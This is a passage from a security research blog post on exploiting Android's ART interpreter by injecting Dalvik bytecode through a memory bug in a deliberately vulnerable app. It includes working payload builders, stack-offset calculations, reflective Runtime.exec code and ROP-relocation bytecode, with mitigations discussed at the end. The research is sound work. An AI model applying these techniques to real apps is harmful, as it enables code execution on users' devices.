.aput_object(v9, v7, v8)
# 0062: 6e 30 07 00 65 07 INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;,[Ljava/lang/Class;)Ljava/lang/reflect/Method;
.invoke_virtual(3, class_getdeclaredmethod_index, [v5, v6, v7])
# 0068: 0c 05 MOVE_RESULT_OBJECT v5
.move_result_object(v5)
# 006a: 6e 10 0d 00 01 00 INVOKE_VIRTUAL {v1}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
.invoke_virtual(1, stringbuilder_tostring_index, [v1])
# 0070: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 0072: 24 10 15 00 06 00 FILLED_NEW_ARRAY {v6}, TYPE:[Ljava/lang/Object;
.filled_new_array(1, 'Object[]', [v6])
# 0078: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 007a: 6e 30 0f 00 45 06 INVOKE_VIRTUAL {v5, v4, v6}, METHOD:Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;,[Ljava/lang/Object;)Ljava/lang/Object;
.invoke_virtual(3, method_invoke_index, [v5, v4, v6])
# 0080: 0e 00 RETURN_VOID
.return_void()
# 0082: 00 00 NOP
.nop()
# 0084: ARRAY_PAYLOAD Array@{108, 111, 103, 32, 34, 104, 101, 108, 108, 111, 32, 116, 104, 101, 114, 101, 33, 34}
.array_payload(2, len(command), command_buffer)
# 00b0: ARRAY_PAYLOAD Array@{101, 120, 101, 99}
.array_payload(2, 4, b'e\x00x\x00e\x00c\x00')).build()
The Java equivalent could look something like this:
char[] cCommand = new char[] { <command> };
StringBuilder bCommand = new StringBuilder();
bCommand.append(cCommand);
char[] cExec = new char[] {'e', 'x', 'e', 'c'};
StringBuilder bExec = new StringBuilder();
bExec.append(cExec);
Runtime runtime = Runtime.getRuntime();
Class<?> runtimeClass = runtime.getClass();
String execName = bExec.toString();
Class[] signature = new Class[] { String.class };
Method exec = runtimeClass.getDeclaredMethod(execName, signature);
String command = bCommand.toString();
Object[] args = new Object[] { command };
exec.invoke(runtime, args);
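The two ARRAY_PAYLOAD entries at the end of the listing hold the command and the method name as 16-bit chars. As a minimal sketch of how such a payload could be serialized by hand, the following Python helper follows the fill-array-data-payload layout from the Dalvik bytecode format (ident 0x0300, element width, element count, data). The function name char_array_payload is hypothetical and is not part of the builder used above.

```python
import struct

def char_array_payload(text: str) -> bytes:
    """Serialize text as a Dalvik fill-array-data payload of 16-bit chars.

    Hypothetical helper for illustration; assumes every character fits
    into a single UTF-16 code unit.
    """
    data = text.encode("utf-16-le")      # two bytes per char, little-endian
    element_width = 2                    # bytes per element
    size = len(data) // element_width    # number of elements
    header = struct.pack("<HHI", 0x0300, element_width, size)
    return header + data

exec_payload = char_array_payload("exec")
command_payload = char_array_payload('log "hello there!"')
print(exec_payload.hex())
print(hex(len(command_payload)))
```

For the 18-character command this yields 0x2c bytes, which matches the distance between the two payloads in the listing (0x0084 to 0x00b0).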
The Attack
With a payload at hand, it is time to abuse the memory error and obtain arbitrary command execution in the context of the target app.
Before injecting the bytecode, the leaked stack address must be understood properly in order to find the exact location of the payload. To that end, a particular execution yields a leak of 0x6eb6aec650. Remember the original C code of writeIndexed:
extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
jint index, jlong value)
__attribute__ ((optnone)) {
uint64_t i;
uint64_t *buffer = &i;
buffer[index] = value;
}
With that in mind, let's consider the following simplified disassembly of the vulnerable writeIndexed method:
sub sp, sp, #0x50
stp x29, x30, [sp, #64]
add x29, sp, #0x40 ; frame pointer = sp + 0x40
sub x8, x29, #0x10 ; buffer = frame pointer - 0x10 = sp + 0x30
str x8, [sp, #8]
...
ldr x9, [sp, #8] ; base address
ldrsw x10, [sp, #28] ; index
mov x11, #0x8 ; element size
madd x9, x10, x11, x9 ; where = index * size + base
str x8, [x9] ; indexed write
In a nutshell, the buffer is located 0x10 bytes below the old base pointer and return address. This can be confirmed using a debugger:
gef➤ x/1gx $sp+0x8
0x6eb6aec628: 0x0000006eb6aec650
gef➤ p/x $x29-0x10
$1 = 0x6eb6aec650
Coincidentally, the pointer leaked via leakStack is exactly the base address of the buffer, relative to which the indexed oob write happens.
Now, two things must be identified:
- At what index does the dex_pc reside?
- Where is a safe location to store the payload?
The first point is addressed to some degree in a previous section that showed a reverse-engineered view of the stack, taking into account nterp and JNI stack frames. Therefore, without showing the details of the stack again, the byte offset to write to can be computed by subtracting the buffer base address from the address of the spilled x22 register. Then, because buffer elements are 64-bit integers, divide by the element size to obtain the final index (we have an indexed oob write).
gef➤ p/x (0x00006eb6aec6d8 - 0x00006eb6aec650) / 8
$2 = 0x11
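The same computation can be sketched in Python, which is convenient when the leak changes between runs. The helper name oob_index is hypothetical; the two addresses are the ones from the debugger session above.

```python
ELEMENT_SIZE = 8  # buffer elements are 64-bit integers

def oob_index(buffer_base: int, target: int) -> int:
    """Translate a target address into an index for the indexed oob write."""
    delta = target - buffer_base
    if delta % ELEMENT_SIZE != 0:
        raise ValueError("target is not aligned to the element size")
    return delta // ELEMENT_SIZE

leak = 0x6eb6aec650          # buffer base address, leaked via leakStack
spilled_x22 = 0x6eb6aec6d8   # stack slot holding the spilled x22 register

print(hex(oob_index(leak, spilled_x22)))  # prints 0x11
```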
Next, the payload must be stored in a stable region on the stack. Most importantly, no data structure required to continue the execution of the (hijacked) bytecode method that called the writeIndexed method may be corrupted. With some testing, it turns out that the payload may be placed 0x1000 bytes behind the buffer base address, i.e. starting at index 0x1000 / 8 = 0x200.
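Putting both answers together, the attack boils down to a sequence of (index, value) pairs passed to writeIndexed. The following Python sketch plans these writes under a few assumptions that are not spelled out above: the payload begins with its first instruction, the stack layout stays the same across calls, and the dex_pc slot is overwritten last so that the payload is fully in place before it is executed. The function name plan_writes is hypothetical.

```python
import struct

ELEMENT_SIZE = 8         # buffer elements are 64-bit integers
PAYLOAD_OFFSET = 0x1000  # payload location relative to the buffer base
DEX_PC_INDEX = 0x11      # index of the spilled x22 register (dex_pc)

def plan_writes(leak: int, payload: bytes) -> list[tuple[int, int]]:
    """Return (index, value) pairs for the indexed oob write primitive."""
    # Pad with zero bytes (nop instructions) up to a multiple of 8 bytes.
    padded = payload + b"\x00" * (-len(payload) % ELEMENT_SIZE)
    first_index = PAYLOAD_OFFSET // ELEMENT_SIZE
    writes = [
        (first_index + i, value)
        for i, (value,) in enumerate(struct.iter_unpack("<Q", padded))
    ]
    # Assumption: redirect dex_pc last, pointing it at the stored payload.
    writes.append((DEX_PC_INDEX, leak + PAYLOAD_OFFSET))
    return writes

for index, value in plan_writes(0x6eb6aec650, b"\x0e\x00"):  # return-void only
    print(hex(index), hex(value))
```

Since writeIndexed takes a jlong, values with the most significant bit set would have to be converted to their signed representation on the Java side.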
For a PoC, consider the following video.
Context-Switching
In this section, I want to discuss a few approaches to handling insufficient contexts during bytecode injection. A major problem arises if the available context does not provide enough types or methods to do anything useful. For example, if the StringBuilder type were missing in the above case study, then the payload would not work. Of course, as is discussed later, we could try to use bytecode as an intermediate stage in case the context is insufficient.
Alternatively, if an attacker wants to execute only bytecode, e.g. because native-level security mechanisms prevent any kind of ROP, then the attacker is left with switching the context. As of writing, two ways to perform context-switching come to mind. Both approaches work by corrupting a different dex_pc than the one that provides an insufficient context. In general, as long as an attacker can ensure that a dex_pc is executed eventually, that dex_pc may be used to switch the execution context. The following visualization shows the high-level idea of context-switching. Notice that the context is determined by an attacker’s goals.
The first approach is to try to corrupt an ArtMethod that is stored in a predictable location. For this to work, the method must be called after the attacker corrupted the dex_pc. Finding an ArtMethod instance is tricky and may require additional information leaks for a remote attacker. In a local setting, there exists a plethora of ArtMethods to be used by an attacker, e.g. in boot.art.
Secondly, if an attacker is only given the ability to corrupt stack values, then the bytecode method call chain can be traversed to find a fitting context. Because the Android runtime is complex, often plenty of method invocations are performed until the vulnerable native method is called eventually. This leaves room to corrupt other dex_pcs belonging to parent methods. However, if an attacker is unable to go up the call chain, then it may be possible to go down the call chain. To that end, an attacker needs to be able to invoke a method that takes in a callback. If an attacker is able to pass a callback consisting of custom bytecode into a method, then this will result in a new call chain until the callback is invoked. These ideas are visualized in the following diagram.
Basically, the above figure shows stack frames matching a call chain. On the left, an attacker corrupts any spilled dex_pc on the stack, potentially switching the context depending on what method is hijacked. On the right, an attacker somehow manages to pass custom bytecode into a method that eventually invokes that bytecode. From there on, an attacker can either use bytecode to corrupt a legitimate, calling method that stems from the callback call chain, or stay in the context of the callback. Notice, however, that specifying a callback most certainly requires knowledge of the class of the callback object. Therefore, specifying a callback requires knowing the context of the callback, which somewhat defeats the purpose of doing this in the first place.
Regardless of what approach is used, the best context to end up in is a .dex file of framework.jar. These .dex files contain a large fraction of the app-related Android runtime and thus provide a lot of types and methods. Moreover, because framework.jar is copied to all apps forked from zygote64, pure bytecode payloads for .dex files of framework.jar are universal for the target device under the assumption that framework.jar does not change.
Further Applications
The case study shows that bytecode injection can be used to fully take over a thread in the target app via a memory error. For the PoC, bytecode is used to invoke a system command.
However, it is also possible to use bytecode as an intermediate stage, e.g. to set up a ROP chain. To that end, remember that vregs are not bounds-checked. Therefore, any attacker-chosen bytecode can access, i.e. read and write, any value on the stack following the vregs and vrefs arrays of the hijacked method. Ignoring the fact that writing to e.g. v0 almost always writes to r0 as well, it is possible for bytecode to set up ROP gadgets on the stack by filling the right vregs and vrefs that overlap with a return address. Notice that one can use bytecode instructions like move-object to always write a value to both vregs and vrefs. Then, an attacker can pretend to only write to vrefs to set up the ROP chain on the stack, fully ignoring the fact that writing to vrefs at some point overwrites the values stored in vregs.
In the example above, using ROP directly is most likely impossible, because an attacker lacks knowledge of the location of an executable memory region to return into. However, because bytecode can read beyond the vregs array, an attacker can pick up a code pointer stored on the stack, e.g. a return address, and use it to compute the base address of the associated module. Of course, an attacker must be able to either identify the module to compute the base address, or handle segfaults to probe for the beginning of the memory region. Given the base address, an attacker can then relocate their own gadgets stored inside the bytecode, e.g. as constants encoded inside instructions, to obtain a fully functional ROP chain. Then, what is left is to link the ROP chain into a return address, which kicks off gadget chain execution.
For example, the following bytecode can be used to grab the base address of libart.so. Notice that return_address_vreg_index and return_address_offset are to be chosen by an attacker and mean the index of the return address in terms of vregs and the offset of the return address relative to libart.so, respectively.
move-wide/16 v0, <return_address_vreg_index>
const-wide v2, <return_address_offset>
sub-long v0, v0, v2
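To make the arithmetic concrete, here is a small Python model of what these three instructions compute. It treats the stack as a list of 32-bit vreg slots, reads the return address as a wide value (low half in the first slot, high half in the next) and subtracts the known offset. All addresses, the slot index and the function names are hypothetical and chosen purely for illustration.

```python
MASK64 = (1 << 64) - 1

def read_wide(vregs: list[int], index: int) -> int:
    """Model of a wide read: low 32 bits at index, high 32 bits at index + 1."""
    return vregs[index] | (vregs[index + 1] << 32)

def module_base(vregs: list[int], return_address_vreg_index: int,
                return_address_offset: int) -> int:
    """Model of move-wide/16, const-wide and sub-long from the snippet above."""
    return_address = read_wide(vregs, return_address_vreg_index)
    return (return_address - return_address_offset) & MASK64

# Hypothetical stack contents: slots 4 and 5 overlap a return address.
vregs = [0, 0, 0, 0, 0x12345678, 0x0000007B]
base = module_base(vregs, 4, 0x345678)
print(hex(base))
```

A cheap sanity check for a computed base address is page alignment, i.e. base % 0x1000 == 0.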
Once a fitting ROP chain is found, parts of the chain must be marked for dynamic relocation. An example of a ROP chain component that does not need relocation is a command string. Of course, if working with the address of the command string, relocation will be necessary again. Consider the generic bytecode for relocating ROP gadgets:
const-wide v2, gadget
add-long v2, v2, v<libart_base_vreg_index>
move-object/16 v<2 * index + return_address_vreg_index>, v2
move-object/16 v<2 * index + return_address_vreg_index + 1>, v3
In a nutshell, gadget is the offset of the current gadget relative to libart.so. The offset is stored to v2 and v3 (64 bits in total) and added to the vreg that holds the base address of libart.so. The result is stored back into v2 and v3. Afterwards, move-object/16 is utilized to move the lower and upper 32-bit values of the relocated address into the vregs and vrefs that represent the current ROP chain gadget on the stack. The above code snippet is executed for each ROP gadget, which means the ROP chain is built up one gadget at a time at runtime. This is only possible because vreg and vref indices are not bounds-checked at runtime. Furthermore, observe that gadget offsets are stored inside the bytecode and relocated using the spilled libart leak.
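The effect of running the relocation snippet once per gadget can be modelled in a few lines of Python. The sketch below only mirrors the index and address arithmetic described above; the function name relocate_chain, the base address, the gadget offsets and the slot index are hypothetical.

```python
MASK32 = 0xFFFFFFFF
MASK64 = (1 << 64) - 1

def relocate_chain(base: int, gadget_offsets: list[int],
                   return_address_vreg_index: int) -> dict[int, int]:
    """Map vreg indices to the 32-bit halves of each relocated gadget address."""
    slots = {}
    for index, offset in enumerate(gadget_offsets):
        address = (base + offset) & MASK64   # const-wide + add-long
        low_slot = 2 * index + return_address_vreg_index
        slots[low_slot] = address & MASK32   # first move: lower 32 bits (v2)
        slots[low_slot + 1] = address >> 32  # second move: upper 32 bits (v3)
    return slots

# Hypothetical values: two gadgets, return address overlapping slots 40/41.
chain = relocate_chain(0x7B12000000, [0x1000, 0x2004], 40)
for slot in sorted(chain):
    print(slot, hex(chain[slot]))
```

Each gadget occupies two consecutive 32-bit slots, which is why the slot index advances by 2 * index.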
Without discussing all the details of the PoC exploit, the following visualization aims to highlight the general idea of using bytecode to relocate a ROP chain.
And finally, to finish off the idea of bytecode-induced ROP attacks, a PoC video is provided!
Another interesting approach may be to look into similar bytecode-related exploitation areas, like V8. Usually, when exploiting a bug in V8, an attacker builds up primitives like fakeobj and addrof, which are often escalated into read and write primitives. Without having looked into this thoroughly, it may be possible to use the same ideas when injecting bytecode to construct and access objects that allow reading from and writing to arbitrary memory regions. However, a limiting factor seems to be that object references are always 32-bit addresses. Luckily, there exist classes like Parcel and its associated C++ implementation that store 64-bit pointers inside objects. Taking into account that Parcel provides methods like writeLong that write a 64-bit value to a location relative to an internal pointer, Parcel seems like the perfect candidate to build up WWW and RWW primitives from bytecode. Furthermore, Parcel is a very common class and thus available in a plethora of contexts. Unfortunately, due to time constraints, I have not been able to construct a PoC for this idea.
Possible Mitigations
Following native-level mitigations against code injection, the first idea that comes to mind is to somehow force nterp to distinguish between code and data. For example, it may be possible to restrict dex_ptr to .dex files only. However, even inside a .dex file, data and code are mixed. For example, the code_item of a method in a .dex file consists of metadata describing the method and the concrete bytecode representing it. Therefore, restricting bytecode execution to .dex files does not suffice, unless it can be guaranteed that redirecting bytecode execution to data structures in a .dex file does not suffice for a successful exploit, which is impossible. Because data and bytecode are closely coupled in memory, nterp cannot use page permissions either: the page permissions are too coarse.
Another approach could be to redesign the layout of .dex files, so that bytecode is stored in executable read-only regions, whereas associated data structures are stored in adjacent read-only memory. Whether this is practical or not is to be determined. Such a major redesign would also need rigorous permission checks, because nterp does not have hardware support that prevents execution of non-executable memory.
Summary
In this blog post, the first bytecode-based exploitation technique, namely bytecode injection, is discussed and demonstrated using a simplistic, deliberately vulnerable Android app. Various caveats regarding bytecode injection, like String construction, method invocation and even insufficient contexts, are explained and solved. Furthermore, it is highlighted how bytecode may function as a stepping stone for other attacks like ROP.
A neat side effect is that bytecode is architecture-agnostic. Only changes to the bytecode interpreter can prevent bytecode shellcode from executing successfully. Because it is possible to create Android apps for various older Android versions, shellcode can most certainly be constructed to be as backward-compatible as an app can be.